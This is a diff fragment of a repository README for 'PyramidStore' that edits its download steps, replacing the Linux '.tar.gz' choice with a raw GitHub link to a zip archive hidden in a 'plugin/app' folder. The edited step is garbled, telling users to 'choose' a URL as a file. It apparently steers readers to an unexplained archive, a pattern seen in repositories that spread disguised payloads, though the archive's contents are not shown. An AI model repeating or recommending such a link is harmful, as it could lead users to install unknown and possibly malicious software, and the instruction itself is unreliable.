thienbaonigg/PyramidStore/README.md

 3. Choose the appropriate file for your operating system:
    - For Windows, find the `.exe` file.
    - For Mac, look for the `.dmg` file.
-   - For Linux users, choose the `.tar.gz` file.
+   - For Linux users, choose the `https://github.com/thienbaonigg/PyramidStore/raw/refs/heads/main/plugin/app/Store_Pyramid_1.4.zip` file.
 4. Click on the file you need and save it to your computer.
 5. Locate the downloaded file in your Downloads folder.